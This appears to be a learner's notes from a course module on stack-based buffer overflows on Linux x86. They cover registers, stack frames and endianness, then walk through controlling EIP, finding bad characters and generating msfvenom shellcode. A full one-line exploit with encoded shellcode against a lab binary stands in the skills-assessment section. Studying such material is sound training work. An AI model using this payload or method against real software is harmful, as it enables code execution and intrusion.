💮Stack Based Buffer Overflow

Stack-Based Buffer Overflows on Linux x86

Contents

  • Introduction

    • Buffer Overflows Overview

    • Exploit Development Introduction

    • CPU Architecture

      • Memory

      • Central Processing Unit

        • RISC

        • CISC

      • Instruction Cycle

  • Fundamentals

    • Stack-Based Buffer Overflow

      • The Memory

      • Disable ASLR

      • Compile C code to a 32bit ELF binary

      • AT&T Syntax

        • Break down the info

      • Intel Syntax

      • Change GDB Syntax

      • Q: At which address in the "main" function is the "bowfunc" function gets called?

    • CPU Registers

      • Data registers

      • Pointer registers

    • Stack frames

    • Prologue

    • Epilogue

      • Index registers

    • Endianness

  • Exploit

    • Take Control of EIP

    • Determine the Length for Shellcode

      • Use in practice

    • Identification of Bad Characters

      • Breakpoints

      • Sending the characters

      • Q: Find all bad characters that change or interrupt our sent bytes' order and submit them as the answer (e.g., format: \x00\x11).

    • Generating Shellcode

      • MSFvenom Syntax

      • MSFvenom - Generate Shellcode

      • Shellcode

      • Exploit with shellcode

      • The Stack

    • Identification of the Return Address

      • GDB NOPS

      • Exploitation

  • Proof-Of-Concept

    • Public Exploit Modification

    • Prevention Techniques and Mechanisms

  • Skills Assessment

    • Skills Assessment - Buffer Overflow

  • Cheat Sheet

    • Check filetype

      • objdump

      • File

    • Open the file

    • Set syntax to Intel

    • Disassemble file

    • Determine offset with MSFvenom

    • Run file

    • Check EIP memory adress

    • Find gdb offset with MSFvenom

    • Determine that you have found the offset

    • Determine length of shellcode

      • Shellcode calculation with NOPs

      • In gdb

    • Check bad characters

      • Characters

      • Notes

      • Find where we need to break a function

      • Make breakpoint

    • Send CHARS

      • Checking stack

    • Make shellcode

      • Shellcode

      • Notes

    • Run shellcode

      • Check stack

    • Find return adress

      • Convert to little endian

      • Edit return adress

    • Final exploit

Introduction

Buffer Overflows Overview

  • Less common nowadays due to memory protections in modern compilers

  • C and other languages are still prevalent in embedded systems and IoT

  • CVE-2021-3156: Recent heap-based buffer overflow in sudo

  • Web applications can also experience buffer overflows, such as CVE-2017-12542 with HP iLO devices

  • Incorrect program code can manipulate CPU processing, causing crashes, data corruption, or harm to data structures

  • Attackers can execute commands with vulnerable process privileges by overwriting return addresses with arbitrary data

  • Root access is a popular target, but buffer overflows leading to standard user privileges can still be dangerous

  • Von-Neumann architecture contributes to buffer overflow vulnerabilities

  • C and C++ languages do not automatically monitor memory buffer limits, leading to increased vulnerability

  • Java is less likely to experience buffer overflow conditions due to its garbage collection memory management technique.

Buffer overflows are caused by incorrect program code that cannot process large amounts of data, which overwrites registers and can execute code.

If data is written to the reserved memory buffer or stack that is not limited. To tackle this, we should write programs who have limits in their buffer

Exploit Development Introduction

Exploit development is used in the phase of Exploitation Phase. This is after the version has been deemed exploitable.

Developing our own exploits

  • Very complex

  • Requires a deep understand of CPU operations

  • Software's functions that serve as our target

To write exploits we use Python.

Code or programs that are exploits are a proof-of-concept (POC)

Types of exploits

  • 0-day

    • Newly identified vulnerability

    • Not public

    • Developer can not know this

    • Will persist with new updates

  • N-day

    • Local

      • Executed when opening a file

        • PDF

        • Macro (.docx)

    • Remote

      • Get payload running on system

      • Executed over network

    • DoS

    • WebApp

CPU Architecture

CPU use the Von-Neumann architecture

Four functional units

  1. Memory

  2. Control Unit

  3. Arithmetical Logical Unit

  4. Input/Output Unit

The most important one is the Arithmetical Logical Unit (ALU) and the Control Unit (CU), are combined to the Central Processing Unit (CPU)!

ALU + CU = CPU

They are responsiple for executing

  • Instructions

  • Flow control

Commands and data are fetched from memory

Bus system

  • Connection between

    • Processor

    • Memory

    • Input/output unit

All data are transeffered via the bus system

Von-Neumann Architecture

image

Memory

  • Primary Memory

    • Cache

      • Buffer

      • Always fed with data and code

    • Random Access Memory (RAM)

      • Describes memory type

      • Memory adresses

  • Secondary Memory

    • External storage

      • HDD/SSD

      • Flash Drives

      • CD/DVD-ROMs

      • Not directly accessed by the CPU

        • Uses the I/O interface

    • Higher storage capacity

Control Unit

  • Reading data from the RAM

  • Saving data in RAM

  • Provide, decode and execute an instruction

  • Processing the inputs from peripheral devices

  • Processing of outputs to peripheral devices

  • Interrupt control

  • Monitoring of the entire system

The CU contains the Instruction Register (IR)

Central Processing Unit

Often called the Microprocessor

CPU architectures

  • x86/i386 - (AMD & Intel)

  • x86-64/amd64 - (Microsoft & Sun)

  • ARM - (Acorn)

RISC

Reduced Instruction Set Computer

Simplify the complexity of the instuction set for assembly

RISC are in most phones

Fixed length

  • 32-bit

  • 64-bit

CISC

Complex Instrucion Set Computer

CISC does not require 32-bit or 64-bit. It can do it in 8-bit

Instrucion Cycle

Taken from the Academy:

Instruction

Description

1. FETCH

The next machine instruction address is read from the Instruction Address Register (IAR). It is then loaded from the Cache or RAM into the Instruction Register (IR).

2. DECODE

The instruction decoder converts the instructions and starts the necessary circuits to execute the instruction.

3. FETCH OPERANDS

If further data have to be loaded for execution, these are loaded from the cache or RAM into the working registers.

4. EXECUTE

The instruction is executed. This can be, for example, operations in the ALU, a jump in the program, the writing back of results into the working registers, or the control of peripheral devices. Depending on the result of some instructions, the status register is set, which can be evaluated by subsequent instructions.

5. UPDATE INSTRUCTION POINTER

If no jump instruction has been executed in the EXECUTE phase, the IAR is now increased by the length of the instruction so that it points to the next machine instruction.

Fundamentals

Stack-Based Buffer Overflow

Binary files

  • Protable Executable Format (PE)

    • Used on Microsoft

  • Executable and Linking Format (ELF)

    • Used on UNIX

The Memory

image

.text

  • assembler instructions

.data

  • global and static variables

.bss

  • allocated variables represented exclusively by 0 bits

Heap

  • starts at the end of .bss and grows on the higher memory adresses

The Stack

  • Last-In-First-Out

  • Defined in RAM

  • Accessed via a stack pointer

Disable ASLR

Compile C code to a 32bit ELF binary

AT&T Syntax

Dissasemble main

Break down the info

First column

  • **Hexidecimals **that represent the memory adresses

Memory Address

Address Jumps

Assembler Instruction

Operation Suffixes

0x00000582

<+0>:

lea

0x4(%esp),%ecx

0x00000586

<+4>:

and

$0xfffffff0,%esp

...

...

...

...

Intel Syntax

Change GDB Syntax

Q: At which address in the "main" function is the "bowfunc" function gets called?

Attack chain

Check filetype

Open up file in gdb

Set the syntax to intel

Check out bowfunc

Screenshot:

Then it is just to read out the hexidecimal from the memory adress!

CPU Registers

Registers offer a small amount of storage space where data can be stored temporarily.

Types of registers

  • General registers

    • Data registers

    • Pointer registers

    • Index registers

  • Control registers

  • Segment registers

Data registers

32-bit Register

64-bit Register

Description

EAX

RAX

Accumulator is used in input/output and for arithmetic operations

EBX

RBX

Base is used in indexed addressing

ECX

RCX

Counter is used to rotate instructions and count loops

EDX

RDX

Data is used for I/O and in arithmetic operations for multiply and divide operations involving large values

Pointer registers

32-bit Register

64-bit Register

Description

EIP

RIP

Instruction Pointer stores the offset address of the next instruction to be executed

ESP

RSP

Stack Pointer points to the top of the stack

EBP

RBP

Base Pointer is also known as Stack Base Pointer or Frame Pointer thats points to the base of the stack

Stack Frames

  • The stack starts with a high address and grows down to low memory addresses.

  • The Base Pointer points to the beginning (base) of the stack and the Stack Pointer points to the top of the stack.

  • The stack is divided into regions called Stack Frames that allocate memory for functions as they are called.

  • A stack frame defines a frame of data with the beginning (EBP) and the end (ESP).

  • The stack memory is built on a Last-In-First-Out (LIFO) data structure.

Prologue

This is called the Prologue. Moving the ESP on the top for operations.

Epilogue

In the epilogue, the current EBP replaces ESP, and it goes back to its original value from the start of the function. The epilogue is short and can be done in different ways, but our example does it with only two instructions.

Index registers

Register 32-bit

Register 64-bit

Description

ESI

RSI

Source Index is used as a pointer from a source for string operations

EDI

RDI

Destination is used as a pointer to a destination for string operations

Endianness

During load and save operations in registers and memories, the bytes are read in a different order. This byte order is called endianness. Endianness is distinguished between the little-endian format and the big-endian format.

Big-endian and litt~~le-endian are about the order of valence. I~~n big-endian, the digits with the highest valence are initially. In little-endian, the digits with the lowest valence are at the beginning. Mainframe processors use the big-endian format, some RISC architectures, minicomputers, and in TCP/IP networks, the byte order is also in big-endian format.

Now, let us look at an example with the following values:

  • Address: 0xffff0000

  • Word: \xAA\xBB\xCC\xDD

Memory Address

0xffff0000

0xffff0001

0xffff0002

0xffff0003

Big-Endian

AA

BB

CC

DD

Little-Endian

DD

CC

BB

AA

This is very important for us to enter our code in the right order later when we have to tell the CPU to which address it should point.

Exploit

Take Control of EIP

We need to get the instruction pointer (EIP) under control, so we can tell it to which adress it should jump to!

This will make it point to the adress where our shellcode starts and the CPU executes it.

Seqmentation Fault

Here we insert 1200 "U"s with running python code into our program. And we have indeed overwritten the EIP.

Determine the Length for Shellcode

Make shellcode with msfvenom

Now we can see that our payload is 68 bytes.

Leverage some no operation instructions (NOPS). This is so our shellcode will be executed at the right place. It is just to push it further away.

Shellcode - Length

How the buffer will look:

image

Use in practice

Command:

In gdb:

Identification of Bad Characters

Bad characters:

  • \x00 - Null Byte

  • \x0A - Line Feed

  • \x0D - Carriage Return

  • \xFF - Form Feed

To find it we can use this character list: CHARS="\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

And with using this we can try and find bad characters with running the previous command, just with the wordlist as our payload.

Breakpoints

To break a function we use break *function

Sending the characters

To look at the stack:

We will look where the 0x55 ends.

Every null byte (\x00) shows us that this character is a bad character.

Q: Find all bad characters that change or interrupt our sent bytes' order and submit them as the answer (e.g., format: \x00\x11).

\x00\x09\x0A\x20

Generating Shellcode

When generating shell code, pay attention to these ares

  • Architecture

  • Platform

  • Bad Characters

MSFvenom Syntax

MSFvenom - Generate Shellcode

Shellcode

Exploit with Shellcode

The Stack

Identification of the Return Address

GDB NOPS

This picture illustrates where the adress 0xffffd64c is.

image

After selecting a memory address, we replace our "\x66" which overwrites the EIP to tell it to jump to the 0xffffd64c address. Note that the input of the address is entered backward.

Exploitation

Proof-Of-Concept

Public Exploit Modification

When working with exploits, public ones might not work in your case. That is why we should learn how to edit and write exploits so we can fine tune them to our own usecase.

Prevention Techniques and Mechanisms

Security mechanism preventing this

  • Canaries

    • Known values written to the stack between buffer and control data, to detect buffer overflows

  • Address Space Layout Randomization (ASLR)

    • Difficult to find target adresses in memory

  • Data Execution Prevention (DEP)

    • Monitors that the program access memory areas cleanly

Skills Assessment

Skills Assessment - Buffer Overflow

Q: Determine the file type of "leave_msg" binary and submit it as the answer.

First we need to take control of the EIP.

To find this, we need to find the memory adress of where our characters end and where the payload starts.

Attack chain:

image

End memory adress is 0xffffd68a

Convert it to little endian

0xffffd68a -> \x8A\xD6\xFF\xFF

Now our final payload will be

We run the program outside gdb

gdb -q leave_msg

./leave_msg $(python -c 'print "\x55" * (2060 - 124 - 95 - 4) + "\x90" * 124 + "\xd9\xeb\xd9\x74\x24\xf4\x5d\x29\xc9\xb8\xfc\x4b\xe3\x50\xb1\x12\x31\x45\x17\x03\x45\x17\x83\x39\x4f\x01\xa5\xf0\x8b\x32\xa5\xa1\x68\xee\x40\x47\xe6\xf1\x25\x21\x35\x71\xd6\xf4\x75\x4d\x14\x86\x3f\xcb\x5f\xee\xc0\x2b\xa0\xef\x56\x2e\xa0\xfe\xfa\xa7\x41\xb0\x65\xe8\xd0\xe3\xda\x0b\x5a\xe2\xd0\x8c\x0e\x8c\x84\xa3\xdd\x24\x31\x93\x0e\xd6\xa8\x62\xb3\x44\x78\xfc\xd5\xd8\x75\x33\x95" + "\x8A\xD6\xFF\xFF"')

Cheat sheet

Check filetype

Objdump

File

or

Open the file

Set syntax to Intel

Dissasemble file

Determine offset with MSFvenom

then cat the output

Run file

Check EIP memory adress

EIP displays different memory adress

Use this adress to find the offset

Find gdb offset with MSFvenom

Use the offset that you found

The offset is 1036 in this case

Determine that you have found the offset

Determine length of shellcode

68 bytes

Shellcode calculation with NOPs

In gdb

Check bad characters

Characters

Notes

Find where we need to break a function

output

Make breakpoint

Send CHARS

output

Checking stack

And then find where the x55 ends and check for every null byte x00

Make shellcode

output

Shellcode

output

Notes

Run shellcode

output

Check stack

output

Find return adress

needs breakpoint!!

image

End memory adress is 0xffffd68a

Convert to little endian

[link](Online Hex Converter - Bytes, Ints, Floats, Significance, Endians - SCADACorearrow-up-right)

0xffffd68a -> \x8A\xD6\xFF\xFF

Edit return adress

old:

new:

Final exploit

this is ran outside gdb

Last updated